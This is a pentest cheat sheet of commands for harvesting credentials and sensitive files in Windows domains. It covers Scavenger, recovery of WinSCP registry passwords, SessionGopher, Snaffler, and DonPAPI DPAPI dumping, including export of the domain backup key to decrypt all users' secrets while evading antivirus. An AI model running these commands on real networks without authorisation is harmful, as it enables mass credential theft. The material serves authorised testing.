# Scavenger is a tool built on top of CrackMapExec to automate the process
# of looking for sensitive files and information during an internal pentest
python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local
$ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite
WinSCP
# WinSCP saved-session credentials stored in the registry are recoverable if no master password is set
# You can query the key manually
reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2"
reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2\Sessions\username@ip"
# Then let's recover the password using the following binary
https://github.com/anoopengineer/winscppasswd/releases
.\winscppasswd ip user
# Automation using CrackMapExec
# Using invoke_sessiongopher you can recover saved-session information for PuTTY, WinSCP, FileZilla, SuperPuTTY or RDP
crackmapexec smb ip -u "user" -p "password" -d "domain" -M invoke_sessiongopher
Snaffler
https://github.com/SnaffCon/Snaffler
# Snaffler is a tool that automates information gathering on Windows hosts and domains
# it focuses on locations such as network shares
snaffler.exe -s -o snaffler.log
-o Enables outputting results to a file. You probably want this if you're not using -s. e.g. -o C:\users\thing\snaffler.log
-s Enables outputting results to stdout as soon as they're found. You probably want this if you're not using -o.
-v Controls verbosity level, options are Trace (most verbose), Debug (less verbose), Info (less verbose still, default), and Data (results only). e.g -v debug
-m Enables and assigns an output dir for snaffler to automatically take a copy of (or Snaffle... if you will) any found files that it likes.
-l Maximum size of files (in bytes) to Snaffle. Defaults to 10000000, which is about 10MB.
-i Disables computer and share discovery, requires a path to a directory in which to perform file discovery.
-d Domain to search for computers to search for shares on to search for files in. Easy.
-c Domain controller to query for the list of domain computers.
-r The maximum size file (in bytes) to search inside for interesting strings. Defaults to 500k.
-j How many bytes of context either side of found strings in files to show, e.g. -j 200
-z Path to a config file that defines all of the above, and much much more! See below for more details. Give it -z generate to generate a sample config file called .\default.toml.
DonPAPI
https://github.com/login-securite/DonPAPI
# Dumps relevant information from compromised targets without triggering AV detection
# With a user password, or the domain PVK, we can unprotect the user's DPAPI secrets.
# Currently gathered info:
# - Windows credentials (scheduled task credentials & a lot more)
# - Windows Vaults
# - Windows RDP credentials
# - AdConnect (still requires a manual operation)
# - Wi-Fi keys
# - Internet Explorer credentials
# - Chrome cookies & credentials
# - Firefox cookies & credentials
# - VNC passwords
# - mRemoteNG passwords (with default config)
# Classic launch
DonPAPI.py domain/user:passw0rd@target
# Using hash
DonPAPI.py --hashes <LM>:<NT> domain/user@target
# Using Kerberos or local auth
DonPAPI.py -k domain/user@target
DonPAPI.py -local_auth user@target
# If user has LAPS reading privilege
DonPAPI.py -laps domain/user:passw0rd@target
# If you are domain admin, you can dump the domain backup key using impacket
# Then you can use the PVK (backup key) to dump all users' secrets
dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip
python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list